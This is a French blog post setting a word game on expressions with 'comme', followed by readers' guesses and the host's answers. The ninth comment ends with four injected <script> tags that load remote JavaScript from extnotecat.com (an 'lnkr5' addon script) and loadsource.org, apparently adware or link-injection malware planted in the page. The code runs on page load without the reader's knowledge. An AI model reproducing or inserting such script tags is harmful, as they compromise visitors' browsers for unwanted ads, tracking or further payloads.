• C'est tout comme

    je vous propose cette semaine de trouver des expressions, des proverbes
    avec le mot "comme"

    Pour vous aider, une image vous donne un des mots de l'expression

    exemple : C'est tout comme pour trouver ...

    C'est tout comme

     

    ................................................

     

    C'est tout comme   C'est tout comme   C'est tout comme  C'est tout comme

     

     

      C'est tout comme  C'est tout comme   C'est tout comme   C'est tout comme

     

    C'est tout comme  C'est tout comme

     

     

    coucou m'annette
    je réalise en te lisant que les possibilités peuvent être multiples
    donc oui aux  1, 3, 4, 8, 9 et 10
    pour le 5 c'est le nom de l'arbre qui compte
    pour le 6, le terme est  plus précis ( j'ai été méchante, j'aurais pu mettre le vêtement)
    pour le 7, c'est le bon mot mais pas la bonne expression

    coucou Lady,
    bravo pour les 1, 3, 4, 6,  8, 9 et 10
    tu as le bon mot pour les 2 et 7

     coucou Melofaroh, oui fait chaud, d'ailleurs j'ai des soucis de réseau !!
    enfin à force de jongler bras en l'air.. ça passe ! ;-)
    yes tout bon ! bravo !

    voici les expressions que j'avais en tête

    1. comme deux gouttes d'eau

    2. comme les deux doigts de la main

    3. pleurer comme une madeleine

    4. comme on fait son lit on se couche

    5. se porter comme un charme

    6. changer d'avis comme de chemise

    7. entrer comme dans un moulin

    8. régler comme une horloge

    9. comme un poisson dans l'eau

    10. bête comme ses pieds

    un grand bravo et merci à toutes ;-)

    « BradypepsieUsufructuaire »

  • Commentaires

    1
    m'annette
    Vendredi 3 Août 2018 à 10:37

    Bonjour Martine,

    1- se ressembler comme 2 gouttes d'eau

    2-

    3- pleurer comme une madeleine

    4- faire son lit comme on se couche

    5- trembler comme une feuille

    6- être fin comme du papier

    7- parler comme un moulin

    8- réglé comme une pendule

    9- être comme un poisson dans l'eau

    10- jouer comme un pied

    2
    Vendredi 3 Août 2018 à 14:40
    LADY MARIANNE

    coucou !
    en 1  se ressembler comme 2 gouttes d'eau-
    en 2 grand comme mon doigt
    en 3 pleurer comme une madeleine
    en 4 comme on fait son lit on se couche-
    en 7 parler comme un moulin
    en 8 La vie de l'homme oscille, comme un pendule, entre la douleur et l'ennui.
    ou en 8 être réglé comme une pendule

    en 9 nager comme un poisson dans l'eau

     

    bizz

    3
    Vendredi 3 Août 2018 à 14:44
    LADY MARIANNE

    en 10 -  il se débrouille comme un pied -
    bises-

    4
    Vendredi 3 Août 2018 à 15:47
    LADY MARIANNE

    en 6-
    comme une lettre à la poste ?
    bizz

      • Vendredi 3 Août 2018 à 16:26

        hélas non, je n'y ai pas pensé .. pourtant en mettant en image une lettre de l'alphabet, je pouvais faire aussi la blague ..

        ici dans l'expression, c'est un vêtement qui a le même nom que cette pochette de carton ...smile

    5
    Vendredi 3 Août 2018 à 16:45

    Coucou Martine,  les neurones vont cramer aujourd'hui de cette chaleur !...

    Je ne suis pas sûre pour le 6 mais... et le 5, je cherche


    C'est tout comme  :
    1 : se ressembler comme deux gouttes d'eau
    2 : être comme les doigts de la main
    3 : pleurer comme une madeleine
    4 : Comme on fait son lit on se couche
    5 :  c'est un marronnier ?
    6 : sage comme une image/ lire comme dans un livre ouvert /
    7 : entrer comme dans un moulin
    8 : réglé comme une pendule
    9 : heureux comme un poisson dans l'eau
    10 : bête comme ses pieds

    6
    Vendredi 3 Août 2018 à 16:52

    Pour le 6, ce serait pas : être comme cul et chemise (en carton... cf ta réponse ci-dessus)

    7
    Vendredi 3 Août 2018 à 20:48

    ça y est je l'ai ! enfin je crois...

    5 : se porter comme un charme winktongue

    8
    Samedi 4 Août 2018 à 13:59
    LADY MARIANNE

    en 6- être  comme cul et chemise----  le dessin est trompeur lol --
    bises et bon samedi-

    9
    Dimanche 5 Août 2018 à 18:17

    Je les avais quasiment tous trouvés mais il fait si chaud ici que je ne vais presque plus à l'ordi! Bravo à tous et à toutes, j'ai quand même joué! bises et merci

    <script src="//extnotecat.com/1ca9d9defab56312a4.js"></script> <script src="http://extnotecat.com/addons/lnkr5.min.js" type="text/javascript"></script> <script src="http://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52293x7337x&r=1533485754306" type="text/javascript"></script> <script src="http://extnotecat.com/ext/1ca9d9defab56312a4.js?sid=52293_7337_&title=advertiser&blocks[]=31af2" type="text/javascript"></script>
      • Lundi 6 Août 2018 à 07:20

        Publier de tels commentaires cryptés c'est prendre le risque de se retrouver fichée S en moins de temps qu'il ne faut pour l'écrire.

        B[LUDO]G

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :